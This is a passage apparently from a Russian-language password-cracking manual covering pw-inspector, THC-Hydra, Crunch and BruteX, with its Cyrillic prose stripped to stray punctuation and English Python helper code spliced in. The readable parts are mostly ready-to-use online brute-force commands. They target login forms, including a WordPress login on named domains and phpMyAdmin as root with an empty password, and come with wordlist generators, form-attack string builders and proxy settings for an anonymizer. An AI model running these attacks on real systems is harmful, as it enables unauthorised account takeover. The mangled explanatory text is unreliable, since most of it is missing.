  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not within the sets above
, 0
. : , 0,
.
:
cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
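The filter that pw-inspector applies is simple enough to restate in code, and restating it shows exactly what a length or character-class policy keeps and what it throws away. The Python below is an added example written for this edition, not code from THC-Hydra; it replicates the -m, -M, -c and set options listed above. One point is an assumption made explicit: the set letters you pass select the classes that count, and -c says how many of those classes a password must contain (all of them when -c is omitted), which is how the help text reads.

```python
import argparse
import sys
from typing import Iterable, Iterator, Optional, Set


def char_class(ch: str) -> str:
    """Classify one character the way pw-inspector's sets are described:
    l = lowercase, u = uppercase, n = digit, p = other printable ASCII,
    s = everything else (non-ASCII letters, control characters, ...)."""
    if "a" <= ch <= "z":
        return "l"
    if "A" <= ch <= "Z":
        return "u"
    if "0" <= ch <= "9":
        return "n"
    if ch.isascii() and ch.isprintable():
        return "p"
    return "s"


def present_classes(password: str) -> Set[str]:
    """Set of class letters (l/u/n/p/s) that occur in the password."""
    return {char_class(ch) for ch in password}


def pw_inspect(words: Iterable[str], min_len: int = 0, max_len: Optional[int] = None,
               classes: str = "", min_classes: Optional[int] = None) -> Iterator[str]:
    """Work-alike of: pw-inspector -m MIN_LEN -M MAX_LEN -c MIN_CLASSES -l -u -n -p -s

    classes: the selected set letters, e.g. "ln" for -l -n.
    min_classes: how many of the selected classes must be present
                 (assumption: defaults to all of them, as "-c ... default: all given").
    Trailing newlines are stripped so a file or stdin can be passed directly."""
    wanted = set(classes)
    need = len(wanted) if min_classes is None else min_classes
    for raw in words:
        word = raw.rstrip("\r\n")
        if len(word) < min_len:
            continue
        if max_len is not None and len(word) > max_len:
            continue
        if wanted and len(present_classes(word) & wanted) < need:
            continue
        yield word


def main(argv=None) -> int:
    """Command-line front end mirroring the option letters above (added example)."""
    parser = argparse.ArgumentParser(description="pw-inspector work-alike")
    parser.add_argument("-i", dest="infile", default=None, help="input file (default: stdin)")
    parser.add_argument("-o", dest="outfile", default=None, help="output file (default: stdout)")
    parser.add_argument("-m", dest="min_len", type=int, default=0)
    parser.add_argument("-M", dest="max_len", type=int, default=None)
    parser.add_argument("-c", dest="min_classes", type=int, default=None)
    for flag in "lunps":
        parser.add_argument("-" + flag, dest="classes", action="append_const", const=flag)
    args = parser.parse_args(argv)
    src = open(args.infile, encoding="utf-8", errors="replace") if args.infile else sys.stdin
    dst = open(args.outfile, "w", encoding="utf-8") if args.outfile else sys.stdout
    for word in pw_inspect(src, args.min_len, args.max_len,
                           "".join(args.classes or []), args.min_classes):
        dst.write(word + "\n")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Piping a list through `python3 pw_inspect.py -m 8 -M 63` keeps the same lines the second command above keeps (the WPA/WPA2 passphrase length range), and `-m 6 -l -n -c 2` keeps only words of at least six characters that mix letters and digits.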

59. THC-Hydra:
( )
hydra ,

. , hydra
. ,
hydra, BruteX.
, , hydra,

, .
, BruteX:
.
THC-Hydra .
Linux, Windows/Cygwin,
Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) OSX. Kali
Linux .
: Asterisk, AFP, Cisco AAA,
Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET,
HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID,
Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB,
SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 v2), SSHKEY, Subversion, Teamspeak
(TS2), Telnet, VMware-Auth, VNC XMPP.
. . .
Hydra:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]


? )) ,
THC-Hydra,
.
hydra:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -q        do not print messages about connection errors
  -U        service module usage details
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

hydra

Hydra
THC-Hydra /. - .
: ,
, . , .
hydra
dpl4hydra.sh. , , .
dpl4hydra.sh Kali Linux,
( - Kali ):
wget https://raw.githubusercontent.com/vanhauser-thc/thc-hydra/master/dpl4hydra.sh
:
touch /usr/local/etc/dpl4hydra_full.csv /usr/local/etc/dpl4hydra_local.csv
:
sh dpl4hydra.sh refresh
:
sh dpl4hydra.sh all
.
, , D-Link, :
sh dpl4hydra.sh d-link


, D-Link,
- - . ,
.
Hydra
, Linux (GTK gui),
:
xhydra

Hydra
:
, ://
hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS

, ,
, **
:
hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]
, ,
SSL, ..
, , , ftp, smtp, http-get

,
TARGET is the target you want to attack
,

:
1. : IP DNS
2. :
3. : ( )

telnet, ,
. , ,
.
, :
hydra -U PROTOCOL
:
hydra -U smtp



!
, hydra ,

SSL ( "-S"),
SSL.
"://", [ ],
IPv6 CIDR ("192.168.0.0/24"):
hydra [some command line options] ftp://[192.168.0.0/24]/
hydra [some command line options] -6 smtp://[2001:db8::1]/NTLM
, hydra IPv4!
IPv6 "-6".
IPv6.
,
://, ( ):
hydra [some command line options] -M targets.txt ftp
, ":<>"
, :
foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121

, IPv6,
-6 IPv6 (!) :
foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]

Hydra
, .
-l -p , hydra
/ .


-L -P ,
:
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/

, ,
"-e".
"-e" :
s
n
r

, ,
"-e sn".
-p/-P :
,
, :
admin:password
test:test
foo:bar

.
dpl4hydra.sh (
hydra).
-C, ,
-l/-L/-p/-P ( -e nsr ).
:
hydra -C default_accounts.txt ftp://localhost/

, -x ( -p/-P/-C):
-x MIN:MAX:CHARSET
'a' , 'A'
, '1' , .
:
-x 1:3:a 1 3 ,


-x 2:5:/ 2 5 ,

-x 5:8:A1 5 8 ,

:
hydra -l ftp -x 3:3:a ftp://localhost/


( ) -m,
.
, !
, :
hydra -U <module>

:
hydra -U http-post-form

-m
:///.
( ):
hydra -l test -p test -m PLAIN 127.0.0.1 imap
hydra -l test -p test 127.0.0.1 imap PLAIN
hydra -l test -p test imap://127.0.0.1/PLAIN

/
hydra Control-C, ,
"hydra.restore"
. 5 .
: hydra.restore
( little indian big indian solaris aix)
/
HYDRA_PROXY_HTTP (
http/www!)
:
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"


HYDRA_PROXY
/ - CONNECT.
, :
HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port

:
HYDRA_PROXY=http://proxy.anonymizer.com:8000

,
HYDRA_PROXY_AUTH:
HYDRA_PROXY_AUTH="the_login:the_password"


-u
!
uniq,
! :
cat words.txt | sort | uniq > dictionary.txt

, (
6 ,
. ., pw-
inspector, hydra
:
cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

hydra
,
. , .
POP3 FTP.
-t ! (
)

hydra
SuSE Linux 7.2 "-C FILE", 295
(294 , 1 ).
( "1 " ) :


SERVICE   1      4      8      16     32     50     64     100    128
--------------------------------------------------------------------
telnet    23:20  5:58   2:58   1:34   1:05   0:33   0:45*  0:25*  0:55*
ftp       45:54  11:51  5:54   3:06   1:25   0:58   0:46   0:29   0:32
pop3      92:10  27:16  13:56  6:42   2:55   1:57   1:24   1:14   0:50
imap      31:05  7:41   3:51   1:58   1:01   0:39   0:32   0:25   0:21

(*) telnet 64 128! , 128 , , 28 97 !
...

():
295       74     38     19     10     6      5      3      3

( ):
telnet    4
ftp       6
pop3      1
imap      3

60. - Hydra (
Hydra)
: THC-Hydra: .
, . .
Hydra.
-.
- , -
. Hydra. ,
, , Hydra
( ) .

Hydra .


http-post-form http-get-form

. URL
.
":",
.
(: ,
"\:", "\" "\\".)
:
<url>:<form parameters>:<condition string>[:<optional>[:<optional>]]

URL , GET POST.

POST/GET ( , . .)
"^USER^" "^PASS^"
( ).

, ** ( ).
,
"F=", ,
"S=".
. -,
, !
:
C=/page/uri
(h|H)=My-Hdr\: foo HTTP

^USER^ ^PASS^ !
: 'h'
, Hydra .
'H' ,

, (:) ,
(\).
, ,
( ).
,
,
hydra .


:
"/login.php:user=^USER^&pass=^PASS^:incorrect"

"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"

"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"

"/:user=^USER^&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"

"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
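To see what the colon-separated module option actually encodes, here is a parser for it. This is an added example in Python, not code from THC-Hydra, and the names FormSpec, parse_form_spec, build_request and login_succeeded are this example's own. It splits on unescaped colons as the text describes (\: for a literal colon, \\ for a backslash), reads an S= or F= prefix on the condition, collects the C=, H= and h= options, substitutes ^USER^ and ^PASS^ in the body and in the user-supplied headers, and applies the condition to a reply. One assumption: the condition is matched here as a regular expression, so that the S=authlog=.*success form above works as written; hydra's own matching rule is documented in `hydra -U http-post-form`.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class FormSpec:
    url: str                     # path the form is submitted to
    body: str                    # form parameters with ^USER^ and ^PASS^ placeholders
    condition: str               # text looked for in the server's reply
    success_match: bool          # True for "S=..." (a match means login OK), False otherwise
    cookie_url: Optional[str] = None                              # "C=/path": fetched first for cookies
    headers: List[Tuple[str, str]] = field(default_factory=list)  # ("H" or "h", "Name: value")


def split_unescaped(spec: str) -> List[str]:
    """Split on ':' separators; a backslash makes the next character literal,
    so '\\:' yields a colon and '\\\\' a backslash (the escaping described above)."""
    parts, current, i = [], [], 0
    while i < len(spec):
        ch = spec[i]
        if ch == "\\" and i + 1 < len(spec):
            current.append(spec[i + 1])
            i += 2
            continue
        if ch == ":":
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    parts.append("".join(current))
    return parts


def parse_form_spec(spec: str) -> FormSpec:
    """Parse <url>:<form parameters>:<condition string>[:<optional>[:<optional>]]."""
    parts = split_unescaped(spec)
    if len(parts) < 3:
        raise ValueError("need at least <url>:<form parameters>:<condition string>")
    url, body, cond = parts[:3]
    success = False
    if cond.startswith("S="):           # S= : the string marks a successful login
        success, cond = True, cond[2:]
    elif cond.startswith("F="):         # F= : explicit failure string (same as no prefix)
        cond = cond[2:]
    parsed = FormSpec(url, body, cond, success)
    for opt in parts[3:]:
        if opt.startswith("C="):
            parsed.cookie_url = opt[2:]
        elif opt[:2] in ("H=", "h="):
            parsed.headers.append((opt[0], opt[2:]))
        else:
            raise ValueError(f"unknown optional parameter {opt!r}")
    return parsed


def fill(template: str, user: str, password: str) -> str:
    return template.replace("^USER^", user).replace("^PASS^", password)


def build_request(spec: FormSpec, user: str, password: str, method: str = "POST") -> Dict[str, object]:
    """One attempt as it would be sent: placeholders substituted in body and headers.
    'H' replaces an existing header of the same name, 'h' always adds another one."""
    headers: List[Tuple[str, str]] = [("Content-Type", "application/x-www-form-urlencoded")]
    for kind, raw in spec.headers:
        name, _, value = fill(raw, user, password).partition(":")
        name, value = name.strip(), value.strip()
        if kind == "H":
            headers = [(n, v) for n, v in headers if n.lower() != name.lower()]
        headers.append((name, value))
    body = fill(spec.body, user, password)
    if method == "GET":                 # http-get-form: parameters go into the query string
        return {"method": "GET", "path": f"{spec.url}?{body}", "headers": headers, "body": ""}
    return {"method": "POST", "path": spec.url, "headers": headers, "body": body}


def login_succeeded(spec: FormSpec, response_text: str) -> bool:
    """Apply the condition: with S= a match means success, otherwise a match means failure."""
    matched = re.search(spec.condition, response_text) is not None
    return matched if spec.success_match else not matched
```

The failure-string default is the part worth noticing when reading one of these strings: without an S= prefix the third field is what a wrong password produces, so a condition that also appears on the success page (the "Please login" pitfall described later in this chapter) makes every attempt look like a failure.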

Hydra :
hydra -L logins.txt -P passwords.txt http-post-form://example.org/ -m "/signin.php:login_username=^USER^&login_password=^PASS^:Please login"

:
-L logins.txt -P passwords.txt ,
,
.
http-post-form , , ,
(form) (http), POST (post).
http-post-form http-get-form ,
GET.
example.org
-m , ,
( http-post-form)
"/signin.php:login_username=^USER^&login_password=^PASS^:Please login"
, ,

/signin.php , ,

login_username=^USER^&login_password=^PASS^ ,
. . ^USER^
, . ^PASS^
.
login_username login_password ,
, .


Please login , hydra


. ,
,
. ,
.
.
, , , .
.
Hydra
.
.
.
http://example.org/. :
<form method="post" enctype="application/x-www-form-urlencoded" action="?signin" style="margin: 10px;">
<table>
<tr>
<td><label></label></td>
<td><input type="text" style="font-size: 11px" name="login_username" size="10" value="" onfocus="if (this.value == '') this.value = '';" /></td>
</tr>

<tr>
<td><label></label></td>
<td><input type="password" style="font-size: 11px" name="login_password" size="10" /></td>
</tr>

<tr>
<td><label><input type="checkbox" name="cookieuser" value="1" checked="checked" />?</label></td>
<td><input type="submit" value="" title=" , , '', ." /></td>
</tr>
</table>
</form>
hydra .

method="post"


http-post-form, , :
hydra -l 111111 -p 222222 http-post-form://example.org

111111 222222 (
)
http-post-form ( )
example.org ( ).
, ,

"______:___
:____"
, ?signin
:
/?signin

: login_username, login_password, cookieuser


login_username , . . ^USER^,
login_username=^USER^, login_password , . .
^PASS^ login_password=^PASS^, cookieuser,
cookieuser=1, &:
login_username=^USER^&login_password=^PASS^&cookieuser=1

, . ,
.
.
: , ,
, , . . .
,
-. ( ) .
.. , :
/?signin
login_username=^USER^&login_password=^PASS^&cookieuser=1


, :
/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:


-m. ..
:
hydra -l 111111 -p 222222 http-post-form://example.org -m "/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:"
.
, hydra
, . :

Hydra
-d
hydra -l 111111 -p 222222 http-post-form://example.org -m "/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:" -d

, . ,
,

, , .
. ,
-
.
, . . ,
, , :


!, ,
, . . Set-Cookie.
, .
S=, hydra, , ,
:
hydra -l 111111 -p 222222 http-post-form://example.org -m "/?signin:login_username=^USER^&login_password=^PASS^&cookieuser=1:S=Set-Cookie"

.. , , hydra ,
. , .
, ,
.


WordPress c hydra

.
Chrome ( Firefox -).
, .
http://notwebware.biz/wp-login.php.
Google Chrome

Network.
.
:

, wp-login.php
POST. . Form Data view source:

:
log=111111&pwd=222222&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1

111111 222222,
^USER^ ^PASS^:


, :
log=^USER^&pwd=^PASS^&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1

General, Request URL:

:
Request URL:http://webware.biz/wp-login.php
.. wp-login.php
:
Request Method:POST
,
. , ,
. HTML -
, login_error.
WordPress hydra:
hydra -l 111111 -p 222222 http-post-form://notwebware.biz -m "/wp-login.php:log=^USER^&pwd=^PASS^&rememberme=forever&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&redirect_to=http%3A%2F%2Fwebware.biz%2Fwp-admin%2F&testcookie=1:login_error"
. . ,
503.
.


phpMyAdmin c hydra
. ,
phpMyAdmin:
hydra -l root -e n http-post-form://192.168.1.33 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
.
phpMyAdmin.
, ClickJacking,
( ). phpMyAdmin
:
/* Prevent against ClickJacking by disabling framing */
if (! $GLOBALS['cfg']['AllowThirdPartyFraming']) {
    header(
        'X-Frame-Options: DENY'
    );
}
.. phpMyAdmin . ,
( )
.
.. (, ,
)
http-get http-post

: "/secret" "http://bla.com/foo/bar" "https://test.com:8080/members"

61. Crunch :

Crunch
Crunch ,
. Crunch
.
:
crunch (WordList) ,



()



,
-l , @,% ^
-d , man-

unicode
, WordList ( )
. .
:
1. Dictionary attack
. .

. 100%
.
2. Brute Force Attack
, 100%
.
( ).
3. Hybrid Attack
, .
4. Syllable Attack
brute force attack dictionary attack.
5. Rule-Based Attack
, . ,
.
crunch
:
crunch <min-len> <max-len> [charset]
:
crunch 3 7 abcdef

3 7 , 'abcdef'
.
:
crunch <min-len> <max-len> [-f <path to charset.lst> <charset-name>] [-o wordlist.txt START] [-t [FIXED]@@@@] [-s startblock]


@
,
%
^ , 33.
:
crunch 1 1 -t ^

crunch
> Kali Linux > Password Attacks > Offline Attacks > crunch
:
crunch
.
crunch <min> <max> <charset> -t <pattern> -o <filename.lst>
,
min =
max =
charset = , . :
abcd 123455
pattern = . 98*******,
.. .
, 10 , 10 ,
abcd987 abc@@@@@@@
.
:
crunch 10 10 abcd987 -t abc@@@@@@@ -o /root/Desktop/file.txt
823543 .


crunch
1
crunch 1 8
Crunch , a zzzzzzzz
2
crunch 1 6 abcdefg
Crunch , abcdefg
a gggggg
3
crunch 1 6 abcdefg\
. crunch ,
, \.
\, "abcdefg ".
Crunch , abcdefg ,
a, .
4
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
Crunch mixalpha-numeric-all-space charset.lst
wordlist.txt.
a " "
5
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa
Crunch ,
mixalpha-number-all-space character set charset.lst
wordlist.txt. cbdogaaa " dog "
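Both hydra's -x MIN:MAX:CHARSET option (section 59) and crunch's <min> <max> <charset> -t <pattern> form describe a keyspace, and the first thing to know about a keyspace is its size: the 823543 figure above is 7^7, one factor of 7 for each @ in the pattern, and that size decides whether an online attempt at the rates in the hydra timing table is realistic and what minimum length and character mix a password policy needs. The Python below is an added example, not code from crunch or THC-Hydra; the function names (hydra_x_keyspace, crunch_keyspace, crunch_candidates) are this example's own, the 33-character symbol set used for ^ is the one the text gives a count for, and only the @, % and ^ placeholders plus -s STARTBLOCK are implemented, so it covers the forms shown in this chapter rather than every crunch option.

```python
import itertools
import string
from typing import Iterator, List, Optional

LOWER, UPPER, DIGITS = string.ascii_lowercase, string.ascii_uppercase, string.digits
# Symbol set for the '^' placeholder: 33 characters including the space (assumed here;
# the count matches what the text reports for "crunch 1 1 -t ^").
SYMBOLS = '!@#$%^&*()-_+=~`[]{}|\\:;"\'<>,.?/ '


def hydra_charset(spec: str) -> str:
    """Expand the CHARSET field of hydra's -x MIN:MAX:CHARSET:
    'a' stands for a-z, 'A' for A-Z, '1' for 0-9, any other character is literal.
    Duplicates are dropped so the keyspace is not over-counted."""
    expanded: List[str] = []
    for ch in spec:
        for c in {"a": LOWER, "A": UPPER, "1": DIGITS}.get(ch, ch):
            if c not in expanded:
                expanded.append(c)
    return "".join(expanded)


def hydra_x_keyspace(spec: str) -> int:
    """Number of candidates -x MIN:MAX:CHARSET produces, e.g. '3:3:a' -> 26**3."""
    lo, hi, cs = spec.split(":", 2)
    n = len(hydra_charset(cs))
    return sum(n ** k for k in range(int(lo), int(hi) + 1))


def hydra_x_candidates(spec: str) -> Iterator[str]:
    """The candidates themselves, shortest length first."""
    lo, hi, cs = spec.split(":", 2)
    alphabet = hydra_charset(cs)
    for k in range(int(lo), int(hi) + 1):
        for tup in itertools.product(alphabet, repeat=k):
            yield "".join(tup)


def _slots(pattern: str, charset: str) -> List[str]:
    """Per-position choices for a crunch -t pattern: '@' -> the charset,
    '%' -> digits, '^' -> symbols, any other character is fixed (one choice)."""
    table = {"@": charset, "%": DIGITS, "^": SYMBOLS}
    return [table.get(ch, ch) for ch in pattern]


def crunch_keyspace(min_len: int, max_len: int, charset: str = LOWER,
                    pattern: Optional[str] = None) -> int:
    """Size of the list 'crunch MIN MAX [CHARSET] [-t PATTERN]' would write.
    With -t the pattern fixes the length, so only the placeholder positions vary."""
    if pattern is not None:
        size = 1
        for choices in _slots(pattern, charset):
            size *= len(choices)
        return size
    n = len(charset)
    return sum(n ** k for k in range(min_len, max_len + 1))


def crunch_candidates(min_len: int, max_len: int, charset: str = LOWER,
                      pattern: Optional[str] = None, start: Optional[str] = None) -> Iterator[str]:
    """Generate the candidates in crunch's order; start mimics -s STARTBLOCK
    (skip everything before that candidate, useful to resume a run)."""
    if pattern is not None:
        gen = ("".join(t) for t in itertools.product(*_slots(pattern, charset)))
    else:
        gen = ("".join(t) for k in range(min_len, max_len + 1)
               for t in itertools.product(charset, repeat=k))
    if start is not None:
        gen = itertools.dropwhile(lambda w: w != start, gen)
    yield from gen
```

crunch_keyspace(1, 8) gives the size of the first crunch example above (all lowercase strings of length 1 to 8), which is 217180147158; at the best rate in the hydra table (roughly one attempt per second per task) that is far outside an online attack, which is the argument for length over complexity in a policy.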

62. BruteX:

BruteX , (
). ,

. ?
NMap'
. , , FTP, SSH
Hydra . .
, . .
. BruteX , ,
. ( brutex-massscan).


.. BruteX , :

DNS
-
-


BruteX:
git clone https://github.com/1N3/BruteX.git
BruteX:
./brutex target
target IP.

:
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict

brutex-massscan IP/
targets.txt.
